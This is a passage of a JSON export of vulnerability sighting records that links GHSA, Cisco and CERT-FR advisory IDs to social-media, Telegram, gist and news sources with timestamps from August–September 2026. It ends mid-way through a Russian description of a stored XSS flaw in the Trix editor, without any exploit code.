"4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-864f-rcv7-6rh4", "type": "seen", "source": "https://bsky.app/profile/newsfacts.bsky.social/post/3mtsmuxidmw27", "content": "", "creation_timestamp": "2026-08-24T06:01:00.963539Z"}, {"uuid": "28cca8b2-115f-43b0-8b1b-1ce3d795cb11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VHM9-85GW-X335", "type": "published-proof-of-concept", "source": "Telegram/dpkxto8hbiMIhO0P8GojYV49fEiH_kEDtpJR3Yq5J38Ekuw", "content": "", "creation_timestamp": "2026-09-23T10:56:09.000000Z"}, {"uuid": "26cec652-19c3-428f-94d3-8a5db66fbdb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20160330-FP", "type": "published-proof-of-concept", "source": "https://t.me/informationsec/850", "content": "", "creation_timestamp": "2026-08-24T00:00:08.604997Z"}, {"uuid": "7edd9d9a-d5cb-49e2-be9d-034bb02bd479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20160218-GLIBC", "type": "published-proof-of-concept", "source": "https://t.me/informationsec/693", "content": "", "creation_timestamp": "2026-08-24T00:00:08.512859Z"}, {"uuid": "8451f24b-4824-4167-b5dd-f2866b32fd18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rrwh-6jrq-wp5v", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtjsq4tke52x", "content": "", "creation_timestamp": "2026-08-20T17:51:42.998907Z"}, {"uuid": "54e34019-de03-4d04-bf75-60b7cefdbf81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-864f-rcv7-6rh4", "type": "seen", "source": "https://bsky.app/profile/endorlabs.bsky.social/post/3mtjogb2gjk23", "content": "", "creation_timestamp": "2026-08-20T16:34:42.237049Z"}, {"uuid": "84ada2e4-6351-4c3f-8e06-66ffb0b6bbc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-864f-rcv7-6rh4", "type": "seen", "source": "https://thehackernews.com/2026/08/isolated-vm-flaw-lets-sandboxed.html", "content": "", "creation_timestamp": "2026-08-20T16:00:51.145275Z"}, {"uuid": "58680f78-5614-47f3-8523-9d0238454205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9r8-2q67-fp86", "type": "seen", "source": "https://thehackernews.com/2026/08/nasa-ait-gui-flaws-could-let.html", "content": "", "creation_timestamp": "2026-08-20T16:00:50.866389Z"}, {"uuid": "cb3fd267-dbbe-474b-aa05-5aba4b191201", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xmp9-244p-5ggv", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/dkm3q4jery2cb", "content": "", "creation_timestamp": "2026-08-20T14:22:23.483193Z"}, {"uuid": "e3233c36-385e-421d-b74c-de7de1ca66c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P9R8-2Q67-FP86", "type": "published-proof-of-concept", "source": "Telegram/s3A4zS-xINsQCOFnw3lncQJfAtm8MI1VE_o1sscCDdPigg", "content": "", "creation_timestamp": "2026-08-20T14:00:04.463819Z"}, {"uuid": "cadbf1af-085f-4b44-ab75-be6a95040ebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wx28-2265-f788", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mteaghlijh2t", "content": "", "creation_timestamp": "2026-08-18T12:40:52.629058Z"}, {"uuid": "38659378-c809-4666-b4e1-457ed90505ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vv82-qvpf-rjwv", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mteae5u7gz26", "content": "", "creation_timestamp": "2026-08-18T12:39:35.214818Z"}, {"uuid": "fa5643da-a9f9-4a81-9278-86ae5f3fdb8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fq9c-x968-g278", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mteabuvri52e", "content": "", "creation_timestamp": "2026-08-18T12:38:18.943680Z"}, {"uuid": "2a0877b5-a2de-4be4-864b-6ae6b2e2731d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8g4w-4ffg-8vgx", "type": "seen", "source": "https://gist.github.com/alon710/2e62558f8ce5c6b39d8a9a9db22fa826", "content": "", "creation_timestamp": "2026-08-18T01:32:24.567425Z"}, {"uuid": "df49e472-6c8c-42ad-8175-414fe0d21c74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7gwp-5pfp-969j", "type": "seen", "source": "https://gist.github.com/alon710/9d43dd3bb8cad3aff005a6b8be53e64d", "content": "", "creation_timestamp": "2026-08-18T00:32:32.450299Z"}, {"uuid": "a4ece613-5c40-42d4-9224-f15ecd06e12f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3F7W-8RR8-F37F", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3388", "content": "", "creation_timestamp": "2026-08-18T00:00:28.522974Z"}, {"uuid": "4641a1b3-9d73-4e81-a3a6-40c8568345c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p64-6gvh-82v5", "type": "seen", "source": "https://gist.github.com/alon710/bb0c1f0112166e936833a909d435a77a", "content": "", "creation_timestamp": "2026-08-17T23:31:40.144015Z"}, {"uuid": "284809e7-1fa8-4dba-90be-4ec46e49f059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gqch-g4w5-7qcw", "type": "seen", "source": "https://gist.github.com/alon710/21683b4d8ecf3653b83554b3c12c2c47", "content": "", "creation_timestamp": "2026-08-17T22:31:53.369226Z"}, {"uuid": "54419a76-ed2c-4ef1-a3bd-ea1ea0293a71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-prg7-hcfm-mfcr", "type": "seen", "source": "https://gist.github.com/alon710/dfd35d68fb93e084af258814e55849da", "content": "", "creation_timestamp": "2026-08-17T21:32:25.577760Z"}, {"uuid": "f5a434c5-a8dd-4b33-b32b-830a46493b13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FHGH-WQ4Q-R37X", "type": "seen", "source": "https://gist.github.com/alon710/714a45d6d9776f210b84a676518696fb", "content": "", "creation_timestamp": "2026-08-17T20:32:43.385873Z"}, {"uuid": "3eb9336d-3a40-4173-a221-f94c9b69dba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qqq4-5773-pmw5", "type": "seen", "source": "https://gist.github.com/alon710/714a45d6d9776f210b84a676518696fb", "content": "", "creation_timestamp": "2026-08-17T20:32:43.338557Z"}, {"uuid": "25e2a459-e038-4710-b829-996023e71aaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c42-7qj2-3j46", "type": "seen", "source": "https://gist.github.com/alon710/53c9694ceb5875fbe39960b018952b7c", "content": "", "creation_timestamp": "2026-08-17T19:31:21.677781Z"}, {"uuid": "dbd41612-332d-4af4-9dfe-49a0bedd634d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q279-jhrf-cc6v", "type": "seen", "source": "https://infosec.exchange/users/secdb/statuses/117111915301325679", "content": "", "creation_timestamp": "2026-08-17T19:30:13.851873Z"}, {"uuid": "0a96adff-2c62-4b52-aa78-6fd47d32ef15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2qj4-mmr9-4v2f", "type": "seen", "source": "https://gist.github.com/alon710/3510ab254b4d34227fef740b05b4af4e", "content": "", "creation_timestamp": "2026-08-17T18:31:27.736239Z"}, {"uuid": "9e14f72f-c727-44bc-a8e5-49d36a0de79f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qcpp-8x79-hhp3", "type": "seen", "source": "https://gist.github.com/alon710/890ba60aaa0a307f816165987f5ce246", "content": "", "creation_timestamp": "2026-08-17T18:02:50.525753Z"}, {"uuid": "d62d256a-316d-46c7-8cee-2b85b3574f3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cfcw-xp6x-25gj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117112142985479395", "content": "", "creation_timestamp": "2026-08-17T17:58:08.323730Z"}, {"uuid": "be524c31-ee60-497f-9ee0-55a102b0319e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m283-3h24-438v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117112142985479395", "content": "", "creation_timestamp": "2026-08-17T17:58:08.279907Z"}, {"uuid": "e580501c-276c-4c60-b35e-63b9cff1db99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m5w8-4gq2-6f8x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117112136854536753", "content": "", "creation_timestamp": "2026-08-17T17:56:34.730661Z"}, {"uuid": "b67e8ac9-ab46-4d2c-b5a9-9193fc0566dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/checkmarxzero.bsky.social/post/3mtc5gshykz24", "content": "", "creation_timestamp": "2026-08-17T16:42:03.655633Z"}, {"uuid": "d90d8ab2-ea1e-4870-ae4d-8523d8ee4de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q83h-524g-xf6h", "type": "seen", "source": "https://bsky.app/profile/seanmonstar.com/post/3mtc4wzyp3z2l", "content": "", "creation_timestamp": "2026-08-17T16:33:14.666132Z"}, {"uuid": "110821bd-1dce-4214-a28c-071501d7ea2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3F7W-8RR8-F37F", "type": "seen", "source": "https://t.me/bdufstecru/3388", "content": "", "creation_timestamp": "2026-08-17T15:00:04.023020Z"}, {"uuid": "e4001ab6-0c62-43a3-8828-bc08fca3c8cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-035", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117111422915196346", "content": "", "creation_timestamp": "2026-08-17T14:55:02.447503Z"}, {"uuid": "a4b4dfc6-9d3a-4be3-90d1-064853d0adab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-035", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mtbxhffsrh2j", "content": "", "creation_timestamp": "2026-08-17T14:55:00.564202Z"}, {"uuid": "12bd4bd1-d6e3-4bd5-bb53-8436023c2410", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xv5j-cwgj-22r4", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3mtbxginal224", "content": "", "creation_timestamp": "2026-08-17T14:54:30.646411Z"}, {"uuid": "9a122ae6-f781-4530-b6d7-b7cd1bb71fd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xv5j-cwgj-22r4", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3mtbvxiltgl2e", "content": "", "creation_timestamp": "2026-08-17T14:28:13.860845Z"}, {"uuid": "ed86120c-c112-42f6-9646-63cc0a11ce26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p3gq-pcg9-qvfv", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mtbtqn42ra2c", "content": "", "creation_timestamp": "2026-08-17T13:48:35.822347Z"}, {"uuid": "2b1f8971-e10b-4146-b3ae-83014119106e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wcrr-jh84-fchg", "type": "seen", "source": "https://gist.github.com/afldl/c6408059717079904adcfdaea934eb1e", "content": "", "creation_timestamp": "2026-08-17T12:42:43.390931Z"}, {"uuid": "77e55f84-b369-4d42-b40c-d4de83a8d100", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X692-Q9X7-8C3F", "type": "seen", "source": "Telegram/9qYdJNeZ50siptVHrqc-g91N4K0CPGozDwGl0Etd8sr4-fM", "content": "", "creation_timestamp": "2026-08-15T08:00:06.793930Z"}, {"uuid": "e4b4fe6e-f9ac-42ad-af78-d6ecec5e5486", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42H9-826W-CGV3", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3385", "content": "", "creation_timestamp": "2026-08-15T00:00:47.522047Z"}, {"uuid": "0a3fcf0a-90d6-42ee-a0ee-3848c952a606", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42H9-826W-CGV3", "type": "seen", "source": "https://t.me/bdufstecru/3385", "content": "", "creation_timestamp": "2026-08-14T14:00:04.513573Z"}, {"uuid": "32fd1db9-6585-4799-99fb-e609ed2f0094", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6v7p-g79w-8964", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3msxlue3duo2y", "content": "", "creation_timestamp": "2026-08-13T12:00:53.214107Z"}, {"uuid": "4141c343-3f86-4cd2-9a16-65da46e81421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VWF4-M7J8-WCJF", "type": "seen", "source": "Telegram/_ZtTgk35S8DFYm2bUVjFV_qqtPnGYEzTcbCUrks9IGhgQhA", "content": "", "creation_timestamp": "2026-08-12T08:00:05.317699Z"}, {"uuid": "afaf9e60-19c9-462d-bf7c-bf2fdc36e3a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7jvv-fhmg-wpfw", "type": "seen", "source": "https://bsky.app/profile/harald.mementomori.social.ap.brid.gy/post/3msuhwgxmzpr2", "content": "", "creation_timestamp": "2026-08-12T06:12:39.653570Z"}, {"uuid": "50739264-e418-4b37-8626-b7da8c45ed34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-87fv-vqqr-m4jr", "type": "seen", "source": "https://gist.github.com/alon710/6fa389a21aaf392bd94e8f902ff02560", "content": "", "creation_timestamp": "2026-08-11T16:32:22.060112Z"}, {"uuid": "601848b4-6728-4b38-a762-fd687a57b1d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2cp6-34r9-54xx", "type": "seen", "source": "https://gist.github.com/hayageek/05ef86a8272d03ab9e54ab5476cf7afe", "content": "", "creation_timestamp": "2026-08-11T09:43:37.504512Z"}, {"uuid": "bd79a6e5-a8e1-4a16-aae2-f1f110930864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3gmf-p6r4-q8m6", "type": "seen", "source": "https://gist.github.com/hayageek/05ef86a8272d03ab9e54ab5476cf7afe", "content": "", "creation_timestamp": "2026-08-11T09:43:37.479827Z"}, {"uuid": "0f314516-d085-4181-b3d1-5180bed3950c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9277-mp7x-85jf", "type": "seen", "source": "https://gist.github.com/hayageek/05ef86a8272d03ab9e54ab5476cf7afe", "content": "", "creation_timestamp": "2026-08-11T09:43:37.352654Z"}, {"uuid": "c6346140-8607-4390-a7f4-8732c07c5bf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5c46-x3qw-q7j7", "type": "seen", "source": "https://gist.github.com/hayageek/05ef86a8272d03ab9e54ab5476cf7afe", "content": "", "creation_timestamp": "2026-08-11T09:43:37.321549Z"}, {"uuid": "85a33c4b-18f0-4400-be6c-545c7ad6275c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7gmj-h9xc-mcxc", "type": "seen", "source": "https://gist.github.com/hayageek/05ef86a8272d03ab9e54ab5476cf7afe", "content": "", "creation_timestamp": "2026-08-11T09:43:37.170075Z"}, {"uuid": "056b3abf-a0e3-4a85-b876-36510c6ac567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fx35-mq7g-6g98", "type": "seen", "source": "https://bsky.app/profile/mfahlandt.bsky.social/post/3mssb4yr3u72w", "content": "", "creation_timestamp": "2026-08-11T09:05:33.874242Z"}, {"uuid": "0d10e039-27be-435a-ad8d-b9b3a4aac937", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m2pw-22cj-jq4v", "type": "seen", "source": "https://bsky.app/profile/scala-lang.org/post/3msr24brbfc2h", "content": "", "creation_timestamp": "2026-08-10T21:27:13.482915Z"}, {"uuid": "3b3ad757-8ebf-4fa0-b7d9-de66d15805f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-89xv-2m56-2m9x", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.358761Z"}, {"uuid": "3a9888ac-d71b-4995-a774-0514aa4b0f6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6g55-p6wh-862q", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.322523Z"}, {"uuid": "81919fd8-f233-4a3e-9a9c-8b599f084976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r28c-9q8g-f849", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.291010Z"}, {"uuid": "5461d2f9-f60d-41fe-a756-27cd96d2255e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m99w-x7hq-7vfj", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.259797Z"}, {"uuid": "279b1123-6a7f-40e7-8aab-20e66b0e167c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6gpp-xcg3-4w24", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.225908Z"}, {"uuid": "30298d28-82a8-489d-b28c-43576463284f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9j2-gv94-2wf4", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.196568Z"}, {"uuid": "da775f76-24f5-4ccf-90e6-c6fb3bebd0fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/4a24aedae8017b5aebed0300d07c7ee9", "content": "", "creation_timestamp": "2026-08-10T19:39:38.167802Z"}, {"uuid": "276a0c38-556e-4269-a902-5f2b47152b3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-89xv-2m56-2m9x", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:38.121076Z"}, {"uuid": "777f0681-2e28-42df-96be-94b235ad3648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6g55-p6wh-862q", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:38.054033Z"}, {"uuid": "2eead7c0-b1cb-4c86-bbaa-b2326e984fe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r28c-9q8g-f849", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:38.016778Z"}, {"uuid": "ce99d405-8ad0-470b-93d8-cfebfef8c0e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m99w-x7hq-7vfj", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:37.981104Z"}, {"uuid": "90547cc3-1efc-4e1d-841f-71af20a388bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6gpp-xcg3-4w24", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:37.944600Z"}, {"uuid": "36e4e5ea-44db-4ad4-8381-e9e063342c69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9j2-gv94-2wf4", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:37.903796Z"}, {"uuid": "67bded7d-f0dd-40b4-a972-920f7913e099", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/8b54bdd2fe9905dc89b9c8ccf42f5fc4", "content": "", "creation_timestamp": "2026-08-10T19:39:37.866460Z"}, {"uuid": "03a1565d-7b63-4496-b376-58fb5e3badb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q67q-549q-p849", "type": "seen", "source": "https://gist.github.com/haidang-infosec/402db84bee7aca2f57bb109b31574649", "content": "", "creation_timestamp": "2026-08-10T17:18:10.300458Z"}, {"uuid": "cb97bc9f-36a3-446f-8c52-93e760acd593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-99pg-hqvx-r4gf", "type": "seen", "source": "https://gist.github.com/haidang-infosec/402db84bee7aca2f57bb109b31574649", "content": "", "creation_timestamp": "2026-08-10T17:18:10.110966Z"}, {"uuid": "e25bc47b-0fa4-47c9-9c7a-867b34894e26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QM2Q-9F3Q-2VCV", "type": "published-proof-of-concept", "source": "https://t.me/critical_bug/1618", "content": "\ud83d\udc4b Stored XSS \u0432 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u043c WYSIWYG-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0435 Trix (\u0432\u0435\u0440\u0441\u0438\u0438 2.1.1), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 Basecamp \u0438 Rails ActionText.\n\n\ud83d\udc1e \u0421\u0443\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c 